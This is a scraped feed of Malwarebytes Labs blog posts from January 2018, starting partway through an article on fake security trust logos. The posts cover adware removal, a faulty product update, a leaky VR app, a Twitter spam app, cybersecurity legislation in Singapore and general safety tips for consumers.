But even if the logos are real and authorized, they may not mean what you think they mean. To help suss out whether a site is trustworthy or not, it’s not a bad idea to learn what these logos actually stand for.


The McAfee SECURE logo is free for websites with up to 500 visitors per month. If you find the real logo on a site, it will be visible as a small “M” in the bottom right-hand corner. You can expand that logo to read about what it means.

In a nutshell, a McAfee SECURE logo indicates the following:

  • There is no malware hosted or linked to on the site.
  • The site has a valid SSL certificate, which means traffic to and from is encrypted.
  • There is no phishing detected.

Which is all well and good. It means the website has been checked for all these points, but it doesn’t mean that the product advertised on the site is endorsed by McAfee. And if you see the logo displayed without an option to see the number of reviews, chances are high that the site owner just pasted that image on their site and didn’t actually earn in. As was the case for our fake online scanner.

Norton Secured Seal

The Norton Secured Seal is included at no cost with all Symantec certificates. If installed on a website not using a Symantec certificate, the seal will not display. Please note that this doesn’t mean it will stop someone from using an unauthorized image on their site. But again, even if the seal is real, it doesn’t mean the product advertised on the site is secure. It just tells us the site has a Symantec SSL certificate.

Microsoft Partner Network

The Microsoft Partner Network (MPN) is designed to help qualified technology companies build, sell, provide, service, and support solutions for their customers with Microsoft technologies. To qualify for the MPN, a technology company must sell or provide more than 75 percent of its IT solutions and services, or derive 75 percent or more of its total revenue through the external monetization of their intellectual property solution(s) to unaffiliated third parties. Nothing in the MPN agreement restricts a company from working with and using non‑Microsoft technologies.

Basically, companies pay a fee for which they get Microsoft tools, training, and software in return—and the right to display a Microsoft partner logo on their product and site. The only “check” that Microsoft performs for the exchange of their tools and logo (that I could find) is to verify that partners derive 75 percent of their business from third parties (non-affiliates). That could be anyone. And it doesn’t guarantee the safety of the products sold on the site.

How can I check the authenticity of the logo?

If you see a McAfee SECURE or Norton Secured Seal on a website, you can check to see if they are real by clicking on the logo. The real logos are clickable and include additional information about their meaning. Fake McAfee and Norton logos will not be clickable or might include incomplete information.

The Microsoft Partner Network is searchable, but unfortunately knowing the name of the product alone is not always enough to find out if that company is a legitimate partner. And the name of the product is not necessarily the same as the name of the company.


As we have learned, it is easy to abuse logos of trust on websites, who use them to fake the appearance of an endorsement of a product or site. It’s also easy to confuse those logos, even when used legitimately, for a blanket statement on the security of the product or site. And since most fraudulent companies change names and sites almost as often as their socks, they don’t care if someone finds out.

That means the best thing you can do to guarantee a safe online purchase or surfing experience is to never assume that a logo automatically makes a site legitimate. Put on your cynical caps, take a closer look, and remember that if it seems too good to be true, it probably is.

Be careful out there!

The post Stolen security logos used to falsely endorse PUPs appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (January 22 – January 28)

Malwarebytes - Mon, 01/29/2018 - 19:00

Last week on Labs, we analyzed a rogue app outbreak on Twitter, took a look at how Singapore’s government is faring with network defense, and rolled out our 2017 State of Malware report. We also became visionaries in Gartner’s Magic Quadrant report and explored a VR data mishap.

Other news

Finally, a tip of the hat and a shout out to the very awesome Hasherezade, who’s been included on a Forbes Europe list of 30 under 30—a fantastic achievement!

Stay safe, everyone!

The post A week in security (January 22 – January 28) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

How to remove adware from your PC

Malwarebytes - Mon, 01/29/2018 - 17:54

“Close. Close. Close. Close,” my mother mumbles as she aggressively clicks her mouse over and over.

“What’s wrong, Ma?” I’m home for the holidays, and cozy, cold evenings are often spent in front of the fireplace. This night, however, my mom is stuck at her computer.

“This stupid thing won’t stop showing me ads.”

“Looks like a job for Malwarebytes!” I joke, but come over to examine. Her screen is loaded with advertisements. Upon closing one, another pops up.

So many pop-ups, so little time.

Looks like mom’s got adware.

What is adware?

Adware is short for advertising-supported software. It’s well-known for being a major Mac nuisance and has made itself ubiquitous on Android OSes, finding its way into the Google Play Store as Trojanized apps.

But adware is a PC problem, too. It delivers ads and other browser-cluttering junk most often in the form of pop-ups, tabs, and toolbars. Beyond simply bombarding you with ads, adware can hijack your browser, redirecting you to sites you weren’t planning on visiting (and showing you ads there) or delivering random, back-alley search engines results. It can slow down your computer and is often frustratingly difficult to remove.

Have some toolbars, courtesy of Mindspark adware.

Why would anyone knowingly install a program that behaves this way? The answer is: They wouldn’t. When legitimate software applications use online advertising, the ads are typically bundled within the program and designed and displayed in ways that the developer specified—and a good developer knows not to piss off customers with overbearing ads. Adware, in contrast, is specifically designed to be a nuisance, sneaking its way onto people’s systems by bundling up with legit programs or disguising itself as something else.

Whether you download adware without full knowledge of what you’re getting or whether it hides in the EULA of another software program like a stowaway, it’s behaving in a way that neither you nor the software it latches onto wants. This is what makes adware a type of potentially unwanted program, or PUP.

How is adware different from PUPs?

Adware is, essentially, a type of potentially unwanted program. PUPs also include other borderline malicious programs, such as spyware, browser lockers, dialers, and junkware. Security companies flag these programs as “potentially” unwanted, but the reality is, any sane person would not want this crap on their computer. Unfortunately, since most people aren’t paying close attention to what they download, they essentially agree to install the programs without realizing it.

Even more unfortunately, any attempts by security companies to fully block these programs as malware can get legally hairy. Thankfully, the cybersecurity industry is making strides in courtroom battles and in public opinion against software providers whose programs cross the line from slight bother to major asspain.

How do you get adware?

The most common ways for adware to infect PCs today are through toolbars/browser extensions, bundled software, and downloads offered by pop-ups.

A Trojan containing adware may pretend to be something you want, such as a plug-in or video player, but what you really end up downloading is an adware installer. Adware may also hide inside a legitimate download from an unethical site. Often, it shows up in downloaded files from torrents or piracy sites. It’s even making its way into the Google Play Store—with more frequency these days—and blessing Android devices with its garbage content.

The common theme among these delivery methods is deception. Adware makers trick users into willfully downloading programs they won’t like by pre-populating check boxes, greying out or minimizing options to skip, or plastering “recommended” next to a preferred option one-too-many times. Half the battle in avoiding adware intrusion on your device is reading install wizards and EULAs with hawk-eyed precision.

A pre-checked box and a tiny EULA screen spells adware

But let’s be real. No one does that.

That means you need a way out when you rush through an install agreement to download the free version of Bejeweled only to be dazzled by a flurry of ads all but ruining your screentime.

How to remove adware

Your way out is relatively simple. If you think you’ve got an adware problem on your PC, you can manually remove it in a few easy steps.

Back up your files. Always a good first precaution when you’re faced with a potential infection. Grab an external hard drive or save your most important data to the cloud.

Download or update necessary tools. To get your computer sparkly clean, you’ll need to download or run updates to a scanner that specializes in removing adware and PUPs (such as Adwcleaner or the free version of Malwarebytes). If you suspect your computer is heavily infected and you don’t have these tools, you’ll want to install them on a friend’s machine and transfer them to yours via CD or USB.

Uninstall unnecessary programs. Before scanning with a security product, check to see if the adware program has an uninstaller. To do this, go to the Add/Remove Programs list in the Windows Control Panel. If the unwanted program is there, highlight it and select the Remove button. After removing the adware, reboot the computer, even if you’re not prompted to do so.

Run a scan with an adware and PUPs removal program. Once the program has scanned and found adware, it will likely quarantine the stuff so you can take a look and decide whether or not to delete it. Our recommendation is delete, delete, delete. This will get rid of adware and any other residual files that could bring the adware back.

Read: How to remove adware from Macs

How to avoid adware infection

While the above steps can rid PCs of most adware, there are a few belligerent forms that are difficult to remove—and these more aggressive adware programs are popping up more and more (pun intended). The makers of adware today have adapted their techniques in order to skirt around more comprehensive ad-blocking tools introduced by major browser developers, including Google, Mozilla, and Microsoft. Their formerly grey tactics have turned to black.

The bad guys bundle their adware and PUPs programs with tools that act as protection against their removal by blocking security software from running or even being installed, or by stopping users from taking measures to remove the adware themselves. The only known way to protect against these attacks right now is to prevent them from happening in the first place. Thankfully, you can do just that with an adware- and malware-blocking security solution like Malwarebytes.

The post How to remove adware from your PC appeared first on Malwarebytes Labs.

Categories: Techie Feeds

IMPORTANT: Web Blocking / RAM Usage

Malwarebytes - Sat, 01/27/2018 - 19:53

Earlier this morning, we published a protection update that caused connection issues for many of our customers. As a side effect of the web protection blocks, the product also spiked memory usage and possibly caused a crash.

We have triaged this issue and pushed a protection update that resolves it.

For our consumer solutions

Please follow the steps below on how to update to the latest database:

1. Open Malwarebytes
2. Turn OFF web protection by Clicking on “settings”, click to turn web protection OFF
3. Under Scan Status (right side), click next to “Updates” to have Malwarebytes download the latest database
4. Restart PC
(Note it may take up to 2 restarts after the update to stabilize the system)

To confirm that you are on the latest database please follow the steps below:

1. Open Malwarebytes
2. Click on Settings
3. Click on the About tab
4. Next to “Update package version” if you see version 1.0.3803 or higher you are on the latest database which addresses the issue.

If the above doesn’t resolve the issue, please reach out to support at

For our business solutions

Please follow the appropriate steps below to update to the latest database:

Malwarebytes Endpoint Security (On-premises)

First step to get the update is to disable the real-time protection. To do this in the Management console:

1. Open up the policy the clients are on and go to the protection tab.
2. From here, disable the ‘enable protection module’ option.
3. Once this is done click OK. When your clients check in they will get this new policy update.
4. Once real-time is protection is disabled and your clients can communicate, highlight the endpoints on the client screen and click the update database button at the top.
5. After the update is applied, a reboot of the machine may be required.

Note: If your client cannot resolve internal addressing, then re-installing the agent manually on the machine will need to be done. The client will not be able to reach out to the server for a policy update and will never be able to turn off the real-time protection.

Malwarebytes Endpoint Protection (Cloud)

1. From the Malwarebytes Cloud console, go to the endpoints pane and select all the endpoints.
2. In the action drop-down, choose the ‘check for protection updates’ option to force an update on all endpoints to database update 1.0.3803.

This should fix the problem for the vast majority of Endpoint Protection endpoints.

If endpoints are still affected after applying this, please reboot the machine.

If the remote agent is unable to reach out and get this update, then we must disable the web protection:

1. In the Malwarebytes Cloud console, Go to the settings> policies> and open up the policy the clients are on.
2. From here, go to the endpoint protection policy and turn off the “Web Protection” portion of the policy. Then:

a. If the machine is unresponsive, reboot the machine and log in.

b. Once in, right click on the tray icon and start a scan. This will force a database update and fix the issue.

c. Once updated, cancel the scan and reboot the machine.

3. When the computers are all online and updated, please turn back on the web protection again in the Endpoint Policy.

The root cause of the issue was a malformed protection update that the client couldn’t process correctly. We have pushed upwards of 20,000 of these protection updates routinely. We test every single one before it goes out. We pride ourselves on the safety and accuracy of our detection engines and will work to ensure that this does not happen again.

Getting your computer or business back up and running is our utmost priority, as is rebuilding your trust.

If the above doesn’t resolve the issue, please reach out to support at


The post IMPORTANT: Web Blocking / RAM Usage appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Plugging a virtual leak: insecure VR app exposes customer data

Malwarebytes - Fri, 01/26/2018 - 22:00

I’ve been giving talks on the possible problems raised by virtual/augmented/mixed reality for a while now, and sure enough, we have what may be one of the first potentially major security issues thrown up by an in-the-wild application. Until a recent fix was applied, users of the pornography app SinVR could have found their subscriber information up for grabs.

Researchers over at Digital Interruption discovered names, email addresses, and device names for anyone with an account alongside those paying for content using PayPal. This information would be great for social engineering, fake SinVR emails, or just plain old blackmail/embarrassment antics should any attacker be so inclined.

They figured this out because while reversing the app, they realised they could make unauthenticated calls to endpoints, thanks to a function which looked as though it allowed SinVR to download a list of all users. Though they would have had to modify the binary to do this via the app, their web API meant it wasn’t necessary thanks to the previously mentioned endpoints.

If we cast our minds back to around the time of the SONY hack, games companies became popular targets, with company hacks, compromised databases, tampered game servers, and all sorts of other shenanigans. At the time, it was clear that many organisations weren’t doing as much as they could for security stakes; although now you don’t see quite as many game developers being compromised in such fashion these days.

VR, however, is a brave new world, and there are many new companies who may be in a similar place more traditional games firms were in a few years ago. While my primary interest in VR is seeing how in-game features can be affected, especially with the slow rise of VR ad networks, it’s clear that customer data—or just reversing the apps themselves—is also going to be a big deal.

The barrier to entry for VR development is lowering all the time, with reasonably priced “DIY” kits available online which allow anyone to start coding games. How many of those bedroom coders, who will no doubt release many of these projects with a price tag attached, will understand the complexities of securing both their games and their databases?

This is sadly likely to be the first of many such accidental VR data reveals. The only good news for the developer is that responsible individuals were the first to catch wind of this particular error, rather than someone up to no good. Of course, we’re only hoping they were the first. Realistically, we have no way of knowing if someone with mischief in mind has already figured it out.

Talk about a virtual catastrophe.

The post Plugging a virtual leak: insecure VR app exposes customer data appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Gartner recognizes Malwarebytes as a “Visionary” in the Magic Quadrant

Malwarebytes - Fri, 01/26/2018 - 19:14

I’m proud to announce that Gartner has recognized Malwarebytes as a “visionary” in the 2018 Gartner Magic Quadrant for Endpoint Protection Platforms. Malwarebytes was selected for its completeness of vision and ability to execute.

Our goal is to give every user a malware-free experience and empower them to navigate safely across devices at work and at home now and well into the future. With threats increasing in both size and scale, it’s clear that traditional solutions have been insufficient at protecting the endpoint. Enterprises are realizing the need to re-evaluate their approach to defending the endpoint and have come to Malwarebytes because of our demonstrated understanding of the threat landscape and execution toward a vision of a unified solution to manage the entire threat life cycle: protection, detection, and response.

The Gartner EPP MQ report notes that Malwarebytes offers strong protection capabilities at an attractive price point. As proof, organizations are deploying the full portfolio of Malwarebytes endpoint protection and remediation security software widely across their operations. During the past 12 months, Malwarebytes experienced a seven-fold increase of large enterprise customers.

10 years delivering best-in-class protection

Malwarebytes recently celebrated its 10-year anniversary. For over a decade, we’ve built exceptional trust with our customers, from consumer to enterprise. We’ve been asked to solve the toughest problems—to bail out infected endpoints—when all else had failed. And with that visibility and insight over the years, we’ve honed our craft and developed the most comprehensive protection for the endpoint. We call it Multi-Vector Protection (MVP).

The road to MVP began when we realized that no single approach could be effective against the plethora of techniques the attackers would be leveraging. Some would deliver payloads by exploiting vulnerabilities, others would conduct targeted spying campaigns in order to drop the most effective malware. Some got around all security barriers with the click of a malicious email attachment. We had to provide comprehensive protection by defending against those and a variety of other attack vectors. That’s why MVP features seven layers of threat detecting, blocking, and removing technology.

It’s this approach that enabled us to protect our customers against threats, such as the high-profile ransomware attacks that made headlines throughout 2017.

What’s next

Great technology and advanced features are for naught if they aren’t deployed or used properly. So a big focus here at Malwarebytes is to ensure that while we’re developing best-of-breed technologies, we’re also making them easy to use. Part of that includes keeping our customers aware of the latest developments in malware and in our products’ ability to protect against it. So while this is in an exciting moment for us here at Malwarebytes, there’s no resting on our laurels.

Stay tuned to learn more about our latest developments in the fight against cybercrime.

The post Gartner recognizes Malwarebytes as a “Visionary” in the Magic Quadrant appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Presenting: Malwarebytes Labs 2017 State of Malware Report

Malwarebytes - Thu, 01/25/2018 - 13:00

2017 was a tumultuous year in politics, media, gender, race—and cybersecurity didn’t beat the rap. Last year was full of twists and turns in the cybercrime world, with major outbreaks, new infection methods, and the evolution of the cryptocurrency crime industry.

In aiming to make sense of the madness, we gathered information from our data science, research, and intel teams throughout the year, checking in on trends, the rise and fall of malware families, distribution methods, and more. What we came up with was a more complete picture of the 2017 threat landscape that showed us just how much can change in a year.

In our 2017 State of Malware report, we examined attack methods, malware developments, and distribution techniques used by cybercriminals over the last 12 months. We dove into the exponential increases of malware volume and severity year-over-year, as well as trends in high-impact threats, such as ransomware and cryptomining. Some of our key takeaways include:

Ransomware volume was up in 2017, but trending downward.

Ransomware detections were up 90 and 93 percent for businesses and consumers respectively in 2017, with several splashy outbreaks accounting for the majority of the increase in rates. However, development of new families and tactics for delivery slowed way down, especially in the last quarter of the year.

What they can’t hold for ransom, criminals will steal instead.

With ransomware slowly going out of favor, criminals pivoted to banking Trojans, spyware, and hijackers in 2017 to attack companies instead. We saw an increase of 40 percent in hijackers and 30 percent in spyware detections in 2017. The second half of the year also marked an average of 102 percent increase in banking Trojan detections.

Cryptomining is out of control.

Alongside a sudden cryptocurrency craze, bad actors have started utilizing cryptomining tools for their own profit, using victim system resources in the process. This includes compromised websites serving drive-by mining code, a significant increase of miners through malicious spam and exploit kit drops, and adware bundlers pushing miners instead of toolbars. By the end of 2017, basically anyone doing any kind of cybercrime was also likely dabbling in cryptomining.

In addition to looking back at 2017, we looked forward to 2018, analyzing current trends and pontificating on what they point to. We realize making predictions about cybercrime is a bit more art than science, but when we look back over years of patterns and data and experience, we can make some educated guesses about where we think this is all going. With that in mind, some of our 2018 predictions include:

A “slow” year for Internet of Things threats means more attacks in 2018.

Attackers spent a lot of time in 2017 developing new tools to take advantage of IoT with spam-spreading botnets and, likely, more DDoS attacks. It’s not farfetched to think we may see DDoS attacks against large organizations, like airline companies and power utilities, demanding a ransom to call off an army of botnet-infected IoT devices. But rather than encrypt files, the attacks will disrupt businesses and their operations until payment has been made.

Cryptocurrency mining fever will give birth to dangerous new threats.

Drive-by mining and skyrocketing values are driving interest in cryptomining from both users and criminals alike—to the point where retailers are now screening potential graphics card customers for miners. Faced with continued volatility, we are likely going to see an evolution of drive-by mining tools, new mining platforms (such as Android and IoT devices), and new forms of malware designed to mine and/or steal cryptocurrency.

To see our complete analysis of key developments in malware, the most interesting attack vectors of the year, predictions for 2018, and more, read:

the 2017 State of Malware report

The post Presenting: Malwarebytes Labs 2017 State of Malware Report appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Singapore government gets into the network defense game

Malwarebytes - Tue, 01/23/2018 - 22:00

There is a common assumption in the infosec community that enormous breaches like those at Equifax, Anthem, and Target are the new norm. That the next mega breach is simply a matter of time. This is because large companies loathe spending money on things that are not directly profitable like secure infrastructure or quality training for employees. Further, there isn’t really any external pressure on corporations to do better—so they won’t.

Some countries have recognized that these sorts of negative externalities cause significant public harm, and have sought to get ahead of the threat curve with cybersecurity legislation. Singapore currently has a comprehensive cybersecurity bill under consideration that is trying very hard to bring a bit of order to the wild west of technology threats. The bill is exhaustive in covering management of cyberthreats, so let’s look at what it does well and what it does not do well.

The good
  • Appoints a national CISO. US cyberdefenses frequently suffer from an unclear chain of command, as well as competing for agency priorities. The buck needs to stop somewhere to mount an effective defense.
  • Designates critical infrastructure. You cannot prioritize defenses for systems you aren’t looking at.
  • Duty to report. This is a big one. Often fearful of liability, stock impact, or impact to reputation, corporations will often sit on cyberattack disclosure for months—sometimes until an executive can sell his company’s stock. Removing any ambiguity on when and how to report breaches gets everyone on the same page.
  • Designates best standards and obliges companies to follow them. There’s currently no consistent, agreed-upon best cybersecurity practices for companies to follow.
  • Power to investigate and force remediation. In contrast to US defense contractors who handle critical infrastructure, were not obligated to report breaches until 2015, and to date have not lost any contracts due to loss of classified data, Singapore’s draft bill grants the authority for a cybersecurity officer to both investigate a critical infrastructure breach, and compel remediation along industry best practices.
  • Licenses infosec corps. While this could be a little iffy in the implementation, holding companies that audit critical infrastructure to an agreed-upon standard benefits everyone. Infrastructure owners know precisely what services they are paying for, cybersecurity officials can judge the impact of standardized services more accurately, and no one has to deal with a Norse Corp.
The not so good
  • Criminal sanctions for offenses. While seemingly a no-brainer, breaches are rarely due to a single individual’s malfeasance, and much more often the end result of a sick corporate process. A more effective deterrent would be fines leveled at the corporate level, and large enough to hurt. While an ineffective company can lose a handful of employees quite easily, they would feel the loss of a profit percentage much more acutely.
  • Secrecy. Many sections within the bill contain provisions for non-disclosure and corresponding fines and imprisonment for anyone speaking out about a breach in a non-approved way. From a governance perspective, this makes sense. Singapore is deriving their authority to monitor critical infrastructure by classifying breaches as a security threat, and a classic belief of governments is that one does not speak publicly of security threats. Network threats are different. Configurations and applications used by a shipping company can have significant overlap with those used at non-critical corporations. Transparency and information sharing not only pressure a breached company to demonstrate an adequate remediation but also offer lessons learned that can keep hundreds of less critical organizations safe. Sunlight and sharing are proven methods for defenders to propagate best solutions to everyone.
What does it mean?

Traditionally, information security has been viewed as the responsibility of individual companies, and not a particularly important one at that. Efforts of countries like Singapore to centralize cyberthreat defense and vulnerability remediation are an attempt to acknowledge the reality that breached infrastructure affects everyone. A hack might stay within an offshore drilling company, but the knock-on effects to shipping, trade, and the environment can create an impact on millions of citizens.

While the law has not traditionally been responsive to technology needs, that is gradually changing. With input from industry leaders and privacy advocates, technology law has the potential to change for our benefit.

Check out the full text of the bill here.

The post Singapore government gets into the network defense game appeared first on Malwarebytes Labs.

Categories: Techie Feeds

“Who visits your Twitter profile” spam app brings week of chaos

Malwarebytes - Tue, 01/23/2018 - 19:17

Twitter spam has been around forever, and rogue apps asking for installs in return for a cool feature (to be more accurate, spamming your contacts) is a constant thorn in our Twittery sides. Over the weekend, we observed a new Twitter app doing the rounds and causing a lot of congestion on people’s timelines.

What is it?

We first noticed this when a number of my contacts using the #FBPE (follow back, pro Europe) hashtag to form networks and make new friends started spamming Tweets similar to the below:

 Click to enlarge

The spam reads as follows:

Goooo!! Click for more information: Who visits your Twitter profile 100% safe, 100% working Click here, available for iOS and Android

Here’s another one:

Click to enlarge

Sign in and download this fantastic app – only available today

Regardless of the spam message used, all the tweets directed people to visit a website located at


How does it spread?

People click the link and are presented with the below website:

Click to enlarge

There’s not a lot to do besides hitting the large “Connect with Twitter” button, and sure enough, doing just that will direct eager clickers to the app install page.

Click to enlarge

It says:

Authorize Recent Visits 24H to use your account?

This application will be able to:

Read tweets from your timeline

See who you follow and follow new people

Update your profile

Find Tweets for you

Will not be able to:

Access your Direct Messages

See your email address

See your Twitter password

In other words, a fairly standard Twitter app permission list.

Tracking the spread

This could have been a bit of a disaster for those on the FBPE hashtag mentioned, which itself is being used to grow follower count and connect with like-minded individuals. Any app claiming to provide information about “profile views” in this situation could have resulted in an accelerated spread, though we doubt they were specifically targeted—it was spreading just fine elsewhere, as we’ll see.

Either way, those on the hashtag quickly figured out it was a scam and took steps to purge it:

One of the other primary drivers of these spam messages was the below message:

Touch the screen and enter the web – You can know who has visited your profile

This was still actually doing the rounds as of yesterday, with a little over 900 results in a simple browser search before it refused to load any more entries:

Click to enlarge

What damage can it do?

As with all things, that depends on the ultimate aim of the scammer. Some just want to spam their website; others will pop an advert or 12, and the worst of the bunch may try to have you download and run some malware. At the time of testing, all this seemed to do was promote the app across timelines and encourage more installs, so the main aggravation here is the knowledge that you installed something useless, and then started beaming said uselessness to all of your contacts. Not a great look, however you stack it.

How do I remove it?

Thankfully, this is an easy one to pull off. Head over to your Applications tab in Twitter via Settings and Privacy, and give your apps list a Spring clean:

Click to enlarge

Some of the apps you may find there could be outdated or no longer updated; if that’s the case, remove them. You don’t want to end up in a situation such as this. Once you’re happy with the end result, simply save and go back to your homepage safe in the knowledge that you won’t be posting any more bad tweets (at least, not automated ones).


A similar number of campaigns were tracked and mapped out by Erin Gallagher, one of which was making use of the URL ultimasvisitass(dot)tk, with some amazing graphs mapped out across three days using Gephi, the open source visualization program. At the time of writing, some of the URLs in play don’t load and checkvisitss redirects to lasttvisitss(dot)tk which is fully functional and offering up an app install. All of the sites involved seem to be registered through a number of anonymous registration services so there’s no real way to figure out who’s behind this batch of app installs.

No matter how you come across these sites, we’d advise you not to bother giving these apps permission. The “See who visited you” routine has been around for years on Twitter and Tumblr, and going even further back to Myspace. In all cases, none of these things ever seem to work and only serve to annoy, spam ads, or offer surveys.

While it’s useful to find out who’s been on your page, it’s really not worth the effort involved in installing a spam app and alienating all of your visitors from wanting to interact with you.

Profile viewer apps offer much, but deliver little. Move your hand away from the Install button and go about your day. Your social media profile’s reputation will thank you for it.

The post “Who visits your Twitter profile” spam app brings week of chaos appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (January 15 – January 21)

Malwarebytes - Mon, 01/22/2018 - 17:53

Last week on Labs, we gave you some background information about cookies, specifically which ones to worry about and why. We also warned you about scams surrounding the Mega Millions winner, who promised to donate his money to good causes.

We analyzed a cryptocurrency miner using a very old technique called Heaven’s Gate to make injections into 64-bit processes from 32-bit loaders. On top of that, we pointed out that there are Chrome and Firefox extensions using “forced installs” that hide from users and hijack browsers. And last but not least, we enticed you to think about some practical New Year’s resolutions related to cybersecurity and privacy.

Other news
  • Google acknowledged a known issue where a bug in the Cast software may incorrectly send a large amount of network traffic, which can slow down or temporarily impact Wi-Fi networks. (Source: Google Support)
  • Soon after, Google announced an update Android phones so an interaction with Chromecast video-streaming devices and Google Home smart speakers won’t whack your Wi-Fi. (Source: CNet)
  • A version of the Satori malware exploits one or more weaknesses in the Claymore Miner,  replacing the owner’s wallet address with an address controlled by the attacker. (Source: ArsTechnica)
  • BlackWallet, another site in the booming cryptocurrency wallet sector, lost their users’ cryptocurrency after what looks like a DNS hijacking attack. (Source: Naked Security)
  • Dark Caracal, a surveillance toolkit-for-hire, has been used to suck huge amounts of data from Androids and Windows desktop PCs around the world. (Source: The Register)
  • A British 15-year-old gained access to intelligence operations in Afghanistan and Iran by pretending to be the head of the CIA. (Source: The Telegraph UK)
  • OnePlus announced that up to 40,000 customers were affected by the security breach that caused the company to shut down credit card payments for its online store earlier this week. (Source: The Verge)]
  • The SamSam ransomware group seems to have gotten off to a “great” start in 2018, hitting several high-profile targets such as hospitals, a city council, and an ICS firm. (Source: Bleeping Computer)
  • GhostTeam adware can steal Facebook accounts and surreptitiously push ads. It was found on 53 apps on Google Play. (Source: Trendlabs)
  • A confusing drop-down menu was the cause of the false missile warning that scared Hawaii. (Source: The Washington Post)
  • Researchers have identified a powerful new Android malware strain called Skygofree capable of eavesdropping on WhatsApp messages and much more. (Source: Threatpost)
  • Lack of authentication was the culprit behind leaks of customer details in an adult VR application called SinVR. (Source: Digital Interruption)

Stay safe, everyone!

The post A week in security (January 15 – January 21) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Cybersecurity New Year’s resolutions, you say? Why not.

Malwarebytes - Fri, 01/19/2018 - 16:00

It’s mid-January, and oh, how time flies. It wasn’t long since we bid farewell to 2017 and welcomed the new year with renewed hope and vigor. Of course, with such positivity comes a sense of an equally favorable outlook for the year ahead. However good that may sound, being faced with a tabula rasa may pose a challenge equivalent to writer’s block: We simply don’t know where to begin.

This is where resolutions come in.

It’s no surprise that our resolutions are usually about health, finances, relationships, and self-improvement. They’re the things that matter to us the most. As all of us live digital lives, too, why not think up cybersecurity New Year’s resolutions that concern our online health and safety as well?

10 cybersecurity resolutions for 2018

Exercise more. Learn a new skill or hobby. Save (more) money.

What most of us probably don’t realize is that these are actually goals, not resolutions. Resolutions are firm decisions you make to do or not do something for your benefit. Here’s a bonus: They are never time-oriented.

Without further ado, below are some New Year’s resolutions that we urge you, dear reader, to start doing in 2018.

(1) I will use two-factor authentication for all my online accounts. 2FAs are awesome. Not only do they add security to your accounts by further verifying that you are who you say you are, but they also protect you from those unlawfully attempting to access your account. So take advantage of these features if they are on offer.

(2) I will back up my files on a regular basis. Believe it or not, your files are in danger. If a strain of ransomware doesn’t hinder you from accessing them, theft, software bugs, or even mother nature would. Because of these, backing up has become an essential security and business continuity practice. Be sure to create multiple copies of personal and work files you can’t live without, and then store them in a number of physical and digital locations, such as an external hard drive or cloud storage.

(3) I will only visit sites that use HTTPS. Not every website on the Internet—even popular ones, sadly—uses HTTPs. Even sadder is that not every one of us seems to mind entering our personally identifiable information (PII) onto HTTP sites in order to use their services. As more and more companies are beginning to realize that security must go hand-in-hand with privacy, it’s important that we start watching which sites we visit and where we enter our information. Opportunely, there are extensions you can install to your browser to automatically connect to HTTPS versions of websites. Take HTTPS Everywhere, for example.

(4) I will routinely review apps on my devices and uninstall those I no longer use or need. What first seems like the must-have app that everyone raves about today is then either abandoned or completely forgotten in the next few days. Unfortunately, out of sight, out of mind actually presents a security risk—this was the outcome of a study by Google a couple of years back. Why is it important to delete unused apps? Not only can unused apps still access and use your sensitive information, but your device could become through vulnerabilities in the apps, especially those that are no longer maintained by the developer. Deleting unused apps will minimize those security risks—not to mention free up some space on your phone.

(5) I will use strong passwords and manage them well. By “strong” we mean long passwords with a combination of lowercase and uppercase letters, numbers, and special characters. And by “manage” we mean not committing all these complicated strings into memory but using software that can help you remember and fill in forms you had been filling in manually in the past. I’m talking about passwords managers. No, paper and Post-Its don’t count. Neither does a master password list you created in Excel.

Read: Why you don’t need 27 different passwords

(6) I will update all my software in a timely manner. Doing this may be inconvenient for some users—particularly when the ill-timed notification pops up while in the middle of defeating that video game boss in hard mode—but think about the inconveniences, headache, hassle, and sleepless nights a vulnerable software could cause if cybercriminals were to successfully exploit it. You may have to retry beating that boss more than once, but there is no going back to how things were if your computing device is compromised.

(7) I will handle emails more carefully. Emails: Can’t live with them, can’t live without them. For some of us, they’re the only means to get in touch with others miles away. Unfortunately, emails are also one of the main avenues cybercriminals can get into your system. In this day and age, clicking a link or opening an attachment can literally turn someone’s life around for the worst. So this year, before doing anything with that email, pause and think things through. Were you expecting an email from someone you know? Does the email seem fishy or “off” somehow? Verify the send by hovering over the email address or going directly to your vendor’s website.

(8) I will think before I post. There’s no harm in posting on social media; however, sharing personal details can be endangering your own privacy. You’re essentially making it easy for online miscreants and persistent threat actors to use your information in crafting a personalized social engineering attack scheme against your system. Not only that, the information you may freely give away can be used to access your accounts or steal your identity.

Do you think you’ve been oversharing? That doesn’t mean you should go cold turkey, but it does mean that you need to tone down on posting stuff about yourself or people close to you. Ask questions: Why am I posting this? If I were the bad guy, what would they get out of this post? Should I really be posting this picture of my bank card?

(9) I will familiarize myself with the latest cybersecurity threats and scams. A long time ago, I overheard someone jokingly say that they don’t watch the news anymore because they’re allergic to bad news. When it comes to news about cybersecurity, we mostly hear or read about the bad stuff. But trust me, no matter how stressful the news can be—take Meltdown and Spectre catching everyone by surprise, for example—the more you know, the more you’re able to protect yourself against new threats. (That said, have you already applied the patches you need for Meltdown and Spectre? If not, this write-up by our very own Jérôme Boursier describes and links to the patches available for various hardware, OS, and software systems.

(10) I will talk to my friends and family about cybersecurity and privacy. It may be a bit awkward at first, or you may be met with glazed over eyes, but you know this is important. These days, politics might dominate the conversation around cybersecurity, but it doesn’t have to be that way. Start off by commenting on a news report about an Internet scam or what some reporters might still call “a new computer virus.” Share any helpful tips you know for protecting against these threats, including any of the resolutions listed above or which cybersecurity program you use that blocks them. Work with what you know. Ask questions, and share your thoughts. They might learn a thing or two from you.

Act now

Making resolutions is one thing. Acting on them is another. In reality, we don’t need to wait for every first day of the year to clean up our computing habits. Resolve to make the small changes now. Whether 2018 may be the year you start building on safe computing habits, reinforcing the good ones you already practice and ditching the old, or not, who knows. Act now and see where it take you.

Have you come up with cybersecurity resolutions of your own? Share them with us in the comments below!

The post Cybersecurity New Year’s resolutions, you say? Why not. appeared first on Malwarebytes Labs.

Categories: Techie Feeds

New Chrome and Firefox extensions block their removal to hijack browsers

Malwarebytes - Thu, 01/18/2018 - 16:00

